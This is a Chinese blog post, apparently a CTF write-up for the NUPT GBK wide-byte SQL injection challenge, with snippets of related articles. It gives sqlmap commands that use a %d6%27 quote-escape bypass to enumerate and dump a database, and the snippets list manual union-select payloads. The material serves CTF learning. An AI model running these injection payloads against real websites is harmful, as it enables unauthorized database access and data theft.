南邮宽字节(sql_gbk)注入

最新推荐文章于 2023-10-10 12:37:18 发布

原创最新推荐文章于 2023-10-10 12:37:18 发布 · 1k 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#sqlmap

渗透测试专栏收录该内容

10 篇文章

订阅专栏

博客提到题目过滤了单引号，采用%d6%27构成宽字节的方式绕过，取消单引号转义，之后直接使用sqlmap。

首先题目过滤了单引号，先绕过，用%d6%27来绕过，构成一个宽字节，取消了单引号的转义，直接上sqlmap

爆数据库:
python sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=2%d6%27" --current-db

这里写图片描述

爆表名:
python sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=2%d6%27" --tables -D sae-chinalover

这里写图片描述

爆ctf4表里面的数据：
python sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=2%d6%27" --dump -T ctf4 -D sae-chinalover

这里写图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Cosmop01itan

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

南邮CTF injection-3 宽字节注入

include_heqile的博客

03-22

3216

从昨天晚上开始做的，结果踩了一个坑，干到了凌晨1点，电脑都自动关机了，也没做出来，电脑关机之后，又用手机查了一下，知道了应该用表名的16进制形式来进行爆表，然后到今天上午才做完，还是上计组的时候用手机的火狐做的，手机做是真的难受宽字节注入就是用一个大于128的十六进制数来吃掉转义符\，gbk编码，字节作为一个字符的编码表名库名的十六进制形式: 字符形式的表名: ctf表示成十...

gbk字符编码和宽字节sql注入

sworddancing is the best one

09-27

2735

ctf题目中宽字节注入是很常见的问题，我这篇文章的目的就是弄明白其中的原理。通常来说，一个gbk编码的汉字通常占用两个字节，一个utf-8编码汉字，占用三个字节，占用3个字节。在php中，我们可以通过输出 echo strlen("和"); 来测试。当将页面编码保存为gbk时输出2，utf-8时输出3。说了这么多废话，现在来研究一下在SQL注入中，gbk字符编码带来的各种...

参与评论您还未登录，请先登录后发表或查看评论

gbk injection

sworddancing is the best one

09-27

1036

以下是我在南邮上做的一道宽字节注入题，先将笔记总结于下，题目：将网址复制下来，因为这将是我们进行注入的数据库的位置所在，因为该题提示是gbk数据库，所以咱们就有利用宽字节注入来解题的思路，接下来咱们用到sql注入工具的一款，sqlmap：首先我们需要爆出数据库命令如下（爆出当前数据库（%df%27是双字节不转义单引号实现注入的方法--原理我会另外总结一片笔记出来链接：https://b...

gbk双字节注入

左手诗人右手剑客

06-12

421

<?php //连接数据库部分，注意使用了gbk编码 $conn = mysql_connect('localhost', 'root', 'toor!@#$') or die('bad!'); mysql_query("SET NAMES 'gbk'"); mysql_select_db('test', $conn) OR emMsg("连接数据库失败，未找到您填写的数据库");...

利用GBK双字节编码突破PHP单引号转义限制进行SQL注入

Exploit的小站~

04-11

3138

今天看了黑防2009精华本下册《双字节编码：PHP的隐形杀手》一文，深受启发。当php.ini中magic_quotes_gpc被设置为on时，提交的参数会被转义，例如，单引号会被转义成了'。一下子截断了字符型注入的路。 GBK双字节编码：一个汉字用两个字节表示，首字节对应0x81-0xFE，尾字节对应0x40-0xFE（除0x7F），刚好涵盖了对应的编码0x5C。 0xD5 0

宽字节注入详解

热门推荐

qq_45927819的博客

03-26

1万+

文章目录1、涉及函数2、原理分析3、实战南邮nctf-sql injection 3sql-labs-32关 1、涉及函数 addslashes() 函数返回在预定义字符之前添加反斜杠的字符串 mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符 mysql_escape_string() 转义一个字符串 2、原理分析先了解一下什么是窄、宽字节已经常见宽字节编码：当某字符的大小为一个字节时，称其字符为窄字节. 当某字符的大小为两个字节时，称

CTF从入门到提升之宽字节注入

anquanniu的博客

08-15

1592

CTF入门到放弃为什么说是从入门到放弃呢？（开个玩笑）如果说大家对CTF有了解的话，其实应该知道CTF是一个什么类型的比赛，这个比赛涉及的范围和影响有多大。如果说你真的想打好比赛，那也是真的非常不容易的，所以说这是非常困难的一件事情，初期可能学着学着就想放弃了，所以我就以这个来作为一个标题，当然本意不是让大家去放弃，就是为了让大家入个门然后再提升！我会和我朋友一起来完成这门课程的讲解。课程主...

mysql 南邮ctf_南邮CTF平台WEB题writeup

weixin_39596739的博客

02-07

2717

https://cgctf.nuptsast.com/login1.签到题F12查看网页源代码就有flag2.md5 collision附上题目给的源代码md51 = md5('QNKCDZO');$a = @$_GET['a'];$md52 = @md5($a);if(isset($a)){if ($a != 'QNKCDZO' && $md51 == $md52) {echo ...

南京邮电大学网络攻防训练平台writeup

weixin_34234829的博客

08-13

1655

为了让各位能够好好查看一下，我违规操作了(QAQ)放在随笔里面了(Orz) 本文转自findneo：https://www.cnblogs.com/findneo/p/nupt-ctf-writeup.html 南邮CTF平台网址： http://ctf.nuptsast.com/challenges http://ctf.nuptzj.cn/cha...

MySQL 宽字节注入——关于GBK编码和UTF-8编码

公众号shadow sock7

04-02

5351

参考： http://blog.youkuaiyun.com/jnbbwyth/article/details/6991425 https://www.leavesongs.com/PENETRATION/mutibyte-sql-inject.html这个文件原文只有ASCII字符，当我加上两个汉字之后就不得不变成了UTF-8字符。 iconv这个工具(MacOS, ubuntu和kali好像是自带的)

CG-CTF-Web-GBK Injection

1stPeak's Blog

07-01

1377

GBK Injection 1.题目 2.首先我们进入题目地址，发现下图所示，首先猜测可能存在sql注入 3.于是我们尝试',但被转义了 4.被转义了，那咋办，此时，想到了URL中%df与\结合会变成運，如下图 5.因此我们可以闭合id的值，使用#，--空格或--+来注释最后一个’ 这里对#进行了过滤，但我们可以使用%23进行绕过 –空格也是标准的SQl注释语句，但这里对空格进行了过滤，...

CG CTF WEB GBK Injection

无限迭代中......

07-02

601

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1 题解： ctf4表里有个假flag 1、 id=1%df' and 1=2 %23 2、 id=1%df' order by 2 %23 3、 id=1%df' and 1=2 union select 1,2 %23 4、 id=1%df' and 1=2 uni...

宽字节注入

u014794949

10-10

326

原因 宽字节注入主要是因为采用了GBK编码，一个gbk编码占用2个字节，一个utf-8占用3个字节常规手段下只需要闭合单引号即可，但当存在转义处理时，需要对payload进行特殊构造常规注入手段 select * from users where id = '1' order by 3 # ' limit 0,1 被过滤后会成为 select * from users where id = '1\'' limit 0,1 构造payload 原始数据代码层过滤 url编码’ 1%d

渗透测试-SQL注入之宽字节注入

lza20001103的博客

04-20

9861

渗透测试-SQL注入之宽字节注入

SQL注入——宽字节注入

weixin_74991270的博客

10-10

739

１．转义符“\”有些符号想让他当作单纯的字符，而不是当作符号的时候，一般可以用： \符号比如：\’　\\’　　　这种情况下，‘和"将被当作正常的字符在数据库之中’与"几乎没有区别，在php之中 ’ 包括的内容完全当作字符串，而 " 包括的内容会进一步进行解析例如：＄a=‘hello’;echo ‘＄a’;//输出:aecho “$a”;//输出：hello２．为什么产生编码：－－为了处理英文字符，产生了ASCII码。

【SQL注入09】宽字符注入基础与实操（基于sqli-labs-less32）

Fighting_hawk的博客

02-20

4247

1. 了解GBK编码简单信息； 2. 理解字节何时会被当做GBK进行解码； 3. 理解宽字符注入的原理； 4. 掌握宽字符注入的方法。

【每天学习一点新知识】跟咩咩一起学“宽字节注入”

RexHa的博客

10-19

2482

如果一个字符的大小是一个字节的，称为窄字节；如果一个字符的大小是两个字节的，成为宽字节像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节，也就是只有两字节英文默认占一个字节，中文占两个字节。

宽字节注入学习记录

nareku的博客

07-12

323

题目地址：http://chinalover.sinaapp.com/SQL-GBK/index.php 看到题目有个提示：传个id，试试传入1 再试试传入id=1’ 传入的单引号被反斜杠转义了，导致参数id无法逃逸出单引号的包围，接下来就简单了，我们可以用宽字节注入。可以看到2是回显点，那么接下来就是和用联和查询的步骤差不多爆库：爆表：接下来就是爆表的列名和具体数据了，一个一个来（这里要注意，为了逃出单引号的包围，表名可以使用十六进制编码来代替第一个表：ctf 第二个表：ctf2